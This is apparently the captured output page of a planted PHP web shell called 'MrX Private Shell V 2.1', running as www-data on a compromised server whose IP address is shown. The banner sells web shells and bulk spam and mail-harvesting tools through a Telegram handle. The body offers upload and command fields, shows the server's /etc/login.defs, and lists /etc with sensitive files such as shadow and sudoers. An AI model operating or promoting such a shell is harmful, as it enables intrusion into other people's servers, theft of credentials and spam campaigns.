__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.92: ~ $
#
# /etc/login.defs - Configuration control definitions for the shadow package.
#

# REQUIRED for useradd/userdel/usermod
#   Directory where mailboxes reside, _or_ name of file, relative to the
#   home directory.  If you _do_ define MAIL_DIR and MAIL_FILE,
#   MAIL_DIR takes precedence.
#
#   Essentially:
#      - MAIL_DIR defines the location of users mail spool files
#        (for mbox use) by appending the username to MAIL_DIR as defined
#        below.
#      - MAIL_FILE defines the location of the users mail spool files as the
#        fully-qualified filename obtained by prepending the user home
#        directory before $MAIL_FILE
#
# NOTE: This is no more used for setting up users MAIL environment variable
#       which is, starting from shadow 4.0.12-1 in Debian, entirely the
#       job of the pam_mail PAM modules
#       See default PAM configuration files provided for
#       login, su, etc.
#
# This is a temporary situation: setting these variables will soon
# move to /etc/default/useradd and the variables will then be
# no more supported
MAIL_DIR        /var/mail
#MAIL_FILE      .mail

#
# Enable display of unknown usernames when login(1) failures are recorded.
#
# WARNING: Unknown usernames may become world readable.
# See #290803 and #298773 for details about how this could become a security
# concern
LOG_UNKFAIL_ENAB	no

#
# Enable logging of successful logins
#
LOG_OK_LOGINS		no

#
# If defined, file which maps tty line to TERM environment parameter.
# Each line of the file is in a format similar to "vt100  tty01".
#
#TTYTYPE_FILE	/etc/ttytype

#
# If defined, file which inhibits all the usual chatter during the login
# sequence.  If a full pathname, then hushed mode will be enabled if the
# user's name or shell are found in the file.  If not a full pathname, then
# hushed mode will be enabled if the file exists in the user's home directory.
#
HUSHLOGIN_FILE	.hushlogin
#HUSHLOGIN_FILE	/etc/hushlogins

#
# *REQUIRED*  The default PATH settings, for superuser and normal users.
#
# (they are minimal, add the rest in the shell startup files)
ENV_SUPATH	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ENV_PATH        PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

#
# Terminal permissions for terminals after login(1).
# These settings are ignored for remote and other logins.
#
#	TTYGROUP	Login tty will be assigned this group ownership.
#	TTYPERM		Login tty will be set to this permission.
#
#TTYGROUP	tty
TTYPERM		0600

#
# Login configuration initializations:
#
#	ERASECHAR	Terminal ERASE character ('\010' = backspace).
#	KILLCHAR	Terminal KILL character ('\025' = CTRL/U).
#
# The ERASECHAR and KILLCHAR are used only on System V machines.
#
ERASECHAR	0177
KILLCHAR	025

# HOME_MODE is used by useradd(8) and newusers(8) to set the mode for new
# home directories.
HOME_MODE	0700

#
# Password aging controls:
#
#	PASS_MAX_DAYS	Maximum number of days a password may be used.
#	PASS_MIN_DAYS	Minimum number of days allowed between password changes.
#	PASS_WARN_AGE	Number of days warning given before a password expires.
#
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7

#
# Min/max values for automatic uid selection in useradd(8)
#
UID_MIN			 1000
UID_MAX			60000
# System accounts
#SYS_UID_MIN		  101
#SYS_UID_MAX		  999
# Extra per user uids
SUB_UID_MIN		   100000
SUB_UID_MAX		600100000
SUB_UID_COUNT		    65536

#
# Min/max values for automatic gid selection in groupadd(8)
#
GID_MIN			 1000
GID_MAX			60000
# System accounts
#SYS_GID_MIN		  101
#SYS_GID_MAX		  999
# Extra per user group ids
SUB_GID_MIN		   100000
SUB_GID_MAX		600100000
SUB_GID_COUNT		    65536

#
# Max number of login(1) retries if password is bad
# This will most likely be overriden by PAM, since the default pam_unix module
# has it's own built in of 3 retries. However, this is a safe fallback in case
# you are using an authentication module that does not enforce PAM_MAXTRIES.
#
LOGIN_RETRIES		5

#
# Max time in seconds for login(1)
#
LOGIN_TIMEOUT		60

#
# Which fields may be changed by regular users using chfn(1) - use
# any combination of letters "frwh" (full name, room number, work
# phone, home phone).  If not defined, no changes are allowed.
# For backward compatibility, "yes" = "rwh" and "no" = "frwh".
#
CHFN_RESTRICT		rwh

#
# If set to MD5, MD5-based algorithm will be used for encrypting password
# If set to SHA256, SHA256-based algorithm will be used for encrypting password
# If set to SHA512, SHA512-based algorithm will be used for encrypting password
# If set to BCRYPT, BCRYPT-based algorithm will be used for encrypting password
# If set to YESCRYPT, YESCRYPT-based algorithm will be used for encrypting password
# If set to DES, DES-based algorithm will be used for encrypting password (default)
# MD5 and DES should not be used for new hashes, see crypt(5) for recommendations.
# Overrides the MD5_CRYPT_ENAB option
#
# Note: It is recommended to use a value consistent with
# the PAM modules configuration.
#
ENCRYPT_METHOD YESCRYPT

#
# Should login be allowed if we can't cd to the home directory?
# Default is no.
#
DEFAULT_HOME	yes

#
# The pwck(8) utility emits a warning for any system account with a home
# directory that does not exist.  Some system accounts intentionally do
# not have a home directory.  Such accounts may have this string as
# their home directory in /etc/passwd to avoid a spurious warning.
#
NONEXISTENT	/nonexistent

#
# If defined, this command is run when removing a user.
# It should remove any at/cron/print jobs etc. owned by
# the user to be removed (passed as the first argument).
#
#USERDEL_CMD	/usr/sbin/userdel_local

#
# If set to yes, userdel(8) will remove the user's group if it contains no more
# members, and useradd(8) will create by default a group with the name of the
# user.
#
# Other former uses of this variable are not used in PAM environments, such as
# Debian.
#
USERGROUPS_ENAB yes

Filemanager

Name Type Size Permission Actions
GNUstep Folder 0755
ImageMagick-7 Folder 0755
NetworkManager Folder 0755
PackageKit Folder 0755
UPower Folder 0755
X11 Folder 0755
alternatives Folder 0755
apache2 Folder 0755
apparmor Folder 0755
apparmor.d Folder 0755
apt Folder 0755
avahi Folder 0755
bash_completion.d Folder 0755
bind Folder 2755
binfmt.d Folder 0755
bluetooth Folder 0755
ca-certificates Folder 0755
chatscripts Folder 2750
chromium Folder 0755
chromium.d Folder 0755
cifs-utils Folder 0755
cloud Folder 0755
console-setup Folder 0755
credstore Folder 0700
credstore.encrypted Folder 0700
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cron.yearly Folder 0755
cups Folder 0755
cupshelpers Folder 0755
dbconfig-common Folder 0755
dbus-1 Folder 0755
dconf Folder 0755
debuginfod Folder 0755
default Folder 0755
depmod.d Folder 0755
dhcp Folder 0755
dictionaries-common Folder 0755
dpkg Folder 0755
emacs Folder 0755
firefox Folder 0755
fonts Folder 0755
gdb Folder 0755
ghostscript Folder 0755
glvnd Folder 0755
groff Folder 0755
gss Folder 0755
gtk-2.0 Folder 0755
gtk-3.0 Folder 0755
hp Folder 0755
ifplugd Folder 0755
init.d Folder 0755
initramfs Folder 0755
initramfs-tools Folder 0755
insserv.conf.d Folder 0755
ipp-usb Folder 0755
issue.d Folder 0755
kernel Folder 0755
keyutils Folder 0755
ld.so.conf.d Folder 0755
ldap Folder 0755
letsencrypt Folder 0755
libblockdev Folder 0755
libibverbs.d Folder 0755
libnl-3 Folder 0755
lightdm Folder 0755
lighttpd Folder 0755
logcheck Folder 0755
logrotate.d Folder 0755
lynx Folder 0755
menu-methods Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
mysql Folder 0755
needrestart Folder 0755
netplan Folder 0755
network Folder 0755
nfs.conf.d Folder 0755
openal Folder 0755
openni2 Folder 0755
opt Folder 0755
pam.d Folder 0755
perl Folder 0755
php Folder 0755
phpmyadmin Folder 0755
plymouth Folder 0755
polkit-1 Folder 0755
ppp Folder 0755
profile.d Folder 0755
pulse Folder 0755
python3 Folder 0755
python3.13 Folder 0755
rc0.d Folder 0755
rc1.d Folder 0755
rc2.d Folder 0755
rc3.d Folder 0755
rc4.d Folder 0755
rc5.d Folder 0755
rc6.d Folder 0755
rcS.d Folder 0755
request-key.d Folder 0755
rpi Folder 0755
rpi-connect Folder 0755
runit Folder 0755
samba Folder 0755
sane.d Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
sgml Folder 0755
skel Folder 0755
snmp Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0755
supercat Folder 0755
sv Folder 0755
sysctl.d Folder 0755
systemd Folder 0755
terminfo Folder 0755
timidity Folder 0755
tmpfiles.d Folder 0755
udev Folder 0755
udisks2 Folder 0755
ufw Folder 0755
update-motd.d Folder 0755
usb_modeswitch.d Folder 0755
vim Folder 0755
vnc Folder 0755
vulkan Folder 0755
wayvnc Folder 0755
webalizer Folder 0755
wpa_supplicant Folder 0755
xdg Folder 0755
xml Folder 0755
xsettingsd Folder 0755
.pwd.lock File 0 B 0600
.updated File 208 B 0644
RTIMULib.ini File 11.82 KB 0644
adduser.conf File 3.89 KB 0644
bash.bashrc File 1.95 KB 0644
bash_completion File 45 B 0644
bindresvport.blacklist File 367 B 0644
ca-certificates.conf File 6.27 KB 0644
catdocrc File 119 B 0644
crontab File 1.98 KB 0644
debconf.conf File 2.9 KB 0644
debian_version File 5 B 0644
deluser.conf File 1.67 KB 0644
dhcpcd.conf File 1.24 KB 0644
e2scrub.conf File 685 B 0644
environment File 0 B 0644
ethertypes File 1.89 KB 0644
fb.modes File 23.93 KB 0644
fstab File 297 B 0644
ftpusers File 132 B 0644
fuse.conf File 725 B 0644
gai.conf File 2.52 KB 0644
gprofng.rc File 3.89 KB 0644
group File 1.07 KB 0644
group- File 1.05 KB 0644
gshadow File 931 B 0640
gshadow- File 913 B 0640
host.conf File 9 B 0644
hostname File 5 B 0644
hosts File 187 B 0644
hosts.allow File 411 B 0644
hosts.deny File 711 B 0644
idmapd.conf File 171 B 0644
inputrc File 1.95 KB 0644
issue File 27 B 0644
issue.net File 20 B 0644
kernel-img.conf File 14 B 0644
ld.so.cache File 83.7 KB 0644
ld.so.conf File 34 B 0644
libaudit.conf File 191 B 0644
locale.alias File 2.93 KB 0644
locale.conf File 92 B 0644
locale.gen File 9.34 KB 0644
localtime File 1.4 KB 0644
login.defs File 5.84 KB 0644
logrotate.conf File 494 B 0644
machine-id File 33 B 0444
magic File 111 B 0644
magic.mime File 111 B 0644
mailcap File 25.93 KB 0644
mailcap.order File 449 B 0644
manpath.config File 5.11 KB 0644
mime.types File 76.45 KB 0644
mke2fs.conf File 813 B 0644
modules File 220 B 0644
motd File 286 B 0644
mtab File 0 B 0444
nanorc File 11.49 KB 0644
netconfig File 767 B 0644
networks File 60 B 0644
nfs.conf File 1.51 KB 0644
nftables.conf File 243 B 0755
nsswitch.conf File 542 B 0644
os-release File 286 B 0644
pam.conf File 552 B 0644
paperspecs File 1.28 KB 0644
passwd File 2.01 KB 0644
passwd- File 2 KB 0644
pip.conf File 57 B 0644
profile File 860 B 0644
protocols File 3.07 KB 0644
request-key.conf File 1.75 KB 0644
resolv.conf File 121 B 0644
rmt File 67.12 KB 0755
rpc File 911 B 0644
rpi-issue File 145 B 0644
sensors3.conf File 10.5 KB 0644
services File 12.69 KB 0644
shadow File 1.05 KB 0640
shadow- File 982 B 0640
shells File 118 B 0644
subgid File 22 B 0644
subuid File 22 B 0644
sudo.conf File 4.24 KB 0644
sudo_logsrvd.conf File 9.57 KB 0644
sudoers File 1.67 KB 0440
timezone File 18 B 0644
ts.conf File 938 B 0644
ucf.conf File 1.23 KB 0644
usb_modeswitch.conf File 1.49 KB 0644
vconsole.conf File 150 B 0644
vdpau_wrapper.cfg File 51 B 0644
vsftpd.conf File 5.73 KB 0644
wgetrc File 4.83 KB 0644
xattr.conf File 681 B 0644
Filemanager